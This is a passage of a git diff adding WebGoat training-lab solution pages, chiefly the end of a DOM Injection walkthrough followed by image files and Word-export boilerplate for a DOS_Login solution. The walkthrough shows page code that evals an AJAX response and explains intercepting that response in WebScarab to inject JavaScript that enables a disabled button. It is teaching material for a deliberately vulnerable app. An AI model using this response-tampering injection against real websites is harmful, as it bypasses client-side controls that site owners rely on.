+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>if (typeof
+XMLHttpRequest != 'undefined') {<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-indent:36.0pt'><span style='font-family:"Arial","sans-serif"'>req
+= new XMLHttpRequest();<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>} else if
+(window.ActiveXObject) {<o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-indent:36.0pt'><span style='font-family:"Arial","sans-serif"'>req
+= new ActiveXObject('Microsoft.XMLHTTP');<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>req.open('GET', url, true);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>req.onreadystatechange = callback;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>req.send(null);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
+callback() {<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>    </span>if (req.readyState == 4) { <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>        </span>if (req.status == 200) { <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>            </span>var message = req.responseText;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-tab-count:3'>                                    </span><span
+style='mso-spacerun:yes'> </span>eval(message);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>        </span>}}}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/script&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The XML
+response contains JavaScript that will activate the button so that you are able
+to click on it. This requires you to inject JavaScript to manipulate the
+Document Object Model of the HTML page in the browser. This requires
+intercepting the HTTP response in WebScarab!<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter a
+license key (for example ‘a’) and intercept the HTTP Request and HTTP Response
+in WebScarab.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_50"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:481.5pt;height:345pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/DOMInjection_files/image004.jpg" v:shapes="Picture_x0020_50"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTP Request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_51" o:spid="_x0000_i1028"
+ type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/DOMInjection_files/image006.jpg" v:shapes="Picture_x0020_51"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTP Response</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
+reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_52"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:481.5pt;height:345pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Updated HTTP Response</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal>The button “Activate!” is now enabled!</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_53" o:spid="_x0000_i1026"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/DOMInjection_files/image010.jpg" v:shapes="Picture_x0020_53"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Activate! Button is enabled</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_54" o:spid="_x0000_i1025"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/DOMInjection_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/DOMInjection_files/image012.jpg" v:shapes="Picture_x0020_54"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/DOMInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/DOMInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/DOMInjection_files/filelist.xml
new file mode 100644
index 000000000..44904329e
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/DOMInjection_files/filelist.xml
@@ -0,0 +1,18 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../DOMInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image010.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image012.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image001.png b/main/project/WebContent/lesson_solutions/DOMInjection_files/image001.png
new file mode 100644
index 000000000..8d3b529b0
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image002.jpg b/main/project/WebContent/lesson_solutions/DOMInjection_files/image002.jpg
new file mode 100644
index 000000000..3f3bccdf5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image003.png b/main/project/WebContent/lesson_solutions/DOMInjection_files/image003.png
new file mode 100644
index 000000000..9effd17b9
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image004.jpg b/main/project/WebContent/lesson_solutions/DOMInjection_files/image004.jpg
new file mode 100644
index 000000000..016c16e12
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image005.png b/main/project/WebContent/lesson_solutions/DOMInjection_files/image005.png
new file mode 100644
index 000000000..844b00d92
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image006.jpg b/main/project/WebContent/lesson_solutions/DOMInjection_files/image006.jpg
new file mode 100644
index 000000000..c3349b050
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image007.png b/main/project/WebContent/lesson_solutions/DOMInjection_files/image007.png
new file mode 100644
index 000000000..d0b0aec8e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image008.jpg b/main/project/WebContent/lesson_solutions/DOMInjection_files/image008.jpg
new file mode 100644
index 000000000..18a4764fe
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image009.png b/main/project/WebContent/lesson_solutions/DOMInjection_files/image009.png
new file mode 100644
index 000000000..d1021bceb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image010.jpg b/main/project/WebContent/lesson_solutions/DOMInjection_files/image010.jpg
new file mode 100644
index 000000000..e9bc078c3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image010.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image011.png b/main/project/WebContent/lesson_solutions/DOMInjection_files/image011.png
new file mode 100644
index 000000000..efe585a32
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/image012.jpg b/main/project/WebContent/lesson_solutions/DOMInjection_files/image012.jpg
new file mode 100644
index 000000000..dd8bf4ac4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/image012.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/DOMInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/DOMInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/DOMInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/DOS_Login.html b/main/project/WebContent/lesson_solutions/DOS_Login.html
new file mode 100644
index 000000000..3a5440d3c
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/DOS_Login.html
@@ -0,0 +1,704 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/DOS_Login_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/DOS_Login_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>39</o:TotalTime>
+  <o:Created>2007-07-11T14:04:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:28:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>151</o:Words>
+  <o:Characters>861</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>7</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1010</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/DOS_Login_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/DOS_Login_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
